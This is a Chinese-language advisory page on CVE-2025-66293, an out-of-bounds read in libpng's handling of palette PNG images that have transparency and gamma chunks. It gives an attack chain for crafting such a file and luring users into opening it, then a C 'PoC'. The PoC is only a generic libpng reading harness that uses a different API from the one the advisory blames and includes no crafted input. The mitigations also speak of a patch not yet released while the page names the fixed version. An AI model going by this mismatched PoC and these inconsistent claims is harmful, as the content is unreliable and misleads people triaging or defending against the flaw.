CVE-2025-66293: libpng越界读取漏洞导致信息泄露与可用性影响

漏洞信息

漏洞编号

CVE-2025-66293

漏洞类型

越界读取

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

libpng

漏洞概述

CVE-2025-66293是libpng 1.6.52之前版本中的一个越界读取安全漏洞。该漏洞位于libpng的简化API中，当处理具有部分透明度和伽马校正的有效调色板PNG图像时，允许读取png_sRGB_base[512]数组之外最多1012字节的数据。触发此漏洞的PNG文件符合PNG规范要求，问题根源在于libpng的内部状态管理缺陷。攻击者可通过诱骗用户打开特制的恶意PNG图像文件来利用此漏洞，可能导致敏感内存信息泄露或应用程序崩溃。由于CVSS评分达到7.1（高危级别），且攻击向量为网络可利用，无需认证即可发起攻击，因此该漏洞对使用libpng处理用户上传PNG图像的Web应用和桌面应用程序构成较高安全风险。建议受影响的用户尽快升级到libpng 1.6.52或更高版本以修复此安全问题。

技术细节

libpng的简化API在处理PNG图像时存在边界检查缺陷。当解析包含调色板（palette）的PNG图像，且该图像同时具备部分透明度和伽马校正信息时，libpng的内部状态管理会出现异常。具体而言，在调用pngimage相关函数处理这类PNG数据时，代码会尝试访问png_sRGB_base数组的边界之外的内存地址。该数组声明大小为512个元素，但由于状态管理错误，读取偏移量可能超出此范围，最多可达1012字节的越界读取。这种越界读取发生在用户空间的堆或栈内存中，可能导致以下后果：1）敏感信息泄露，如内存中存储的密钥、密码或其他机密数据；2）应用程序崩溃，因为读取到未映射的内存页面；3）为更复杂的攻击提供信息基础。漏洞触发条件明确要求PNG文件必须同时满足三个特征：有效的调色板格式、包含透明度信息、包含伽马校正参数。这三个条件的组合导致libpng进入异常代码路径，最终引发越界访问。

攻击链分析

STEP 1

步骤1: 侦察与准备

攻击者识别目标应用是否使用存在漏洞的libpng版本（<1.6.52）处理PNG图像。重点关注图像上传功能、头像处理、文档转换等模块。

STEP 2

步骤2: 恶意PNG构造

攻击者精心构造一个符合PNG规范的图像文件，必须同时包含：调色板颜色类型（PNG_COLOR_TYPE_PALETTE）、透明度信息（tRNS chunk）、伽马校正参数（gAMA chunk）。此文件在正常图像查看器中可正常显示，但在libpng处理时会触发越界读取。

STEP 3

步骤3: 诱骗用户触发

通过社交工程手段（如钓鱼邮件、恶意网页）诱骗目标用户上传或打开该特制PNG文件。用户交互是必需的（UI:R），因为需要用户主动处理该图像。

STEP 4

步骤4: 越界读取执行

当libpng使用简化API处理该PNG时，由于内部状态管理错误，在应用伽马校正过程中访问png_sRGB_base[512]数组边界外最多1012字节的内存。

STEP 5

步骤5: 影响利用

越界读取的内存数据可能被返回给攻击者（信息泄露），或导致应用程序崩溃（拒绝服务）。攻击者可能利用泄露的内存信息进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66293 PoC - Malicious PNG trigger
// Requirements: A specially crafted PNG with palette, partial transparency, and gamma correction

#include <stdio.h>
#include <stdlib.h>
#include <png.h>

void process_png(const char *filename) {
    FILE *fp = fopen(filename, "rb");
    if (!fp) return;
    
    png_structp png = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL);
    png_infop info = png_create_info_struct(png);
    
    if (setjmp(png_jmpbuf(png))) {
        printf("Error reading PNG\n");
        png_destroy_read_struct(&png, &info, NULL);
        fclose(fp);
        return;
    }
    
    png_init_io(png, fp);
    png_read_info(png, info);
    
    // Trigger vulnerability: palette + transparency + gamma
    int width = png_get_image_width(png, info);
    int height = png_get_image_height(png, info);
    png_byte color_type = png_get_color_type(png, info);
    png_byte bit_depth = png_get_bit_depth(png, info);
    
    // Convert to RGBA if palette type
    if (color_type == PNG_COLOR_TYPE_PALETTE) {
        png_set_palette_to_rgb(png);
    }
    
    // Enable transparency handling
    if (png_get_valid(png, info, PNG_INFO_tRNS)) {
        png_set_tRNS_to_alpha(png);
    }
    
    // Enable gamma correction - THIS TRIGGERS THE BUG
    double gamma;
    if (png_get_gAMA(png, info, &gamma)) {
        png_set_gamma(png, 2.2, gamma);
    }
    
    png_read_update_info(png, info);
    
    // Allocate and read rows
    png_bytep *row_pointers = (png_bytep*)malloc(sizeof(png_bytep) * height);
    for (int y = 0; y < height; y++) {
        row_pointers[y] = (png_byte*)malloc(png_get_rowbytes(png, info));
    }
    
    png_read_image(png, row_pointers);
    
    // Cleanup
    for (int y = 0; y < height; y++) {
        free(row_pointers[y]);
    }
    free(row_pointers);
    png_destroy_read_struct(&png, &info, NULL);
    fclose(fp);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <png_file>\n", argv[0]);
        return 1;
    }
    process_png(argv[1]);
    return 0;
}

影响范围

libpng < 1.6.52

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制或禁用应用中的PNG图像上传和处理功能；2）使用图像处理沙箱隔离libpng的图像解析操作；3）部署Web应用防火墙（WAF）规则检测异常PNG文件特征；4）监控应用程序日志，及时发现异常崩溃或内存访问错误；5）考虑使用其他图像库（如stb_image、ImageMagick）作为临时替代方案，但需确保这些库本身不存在类似漏洞。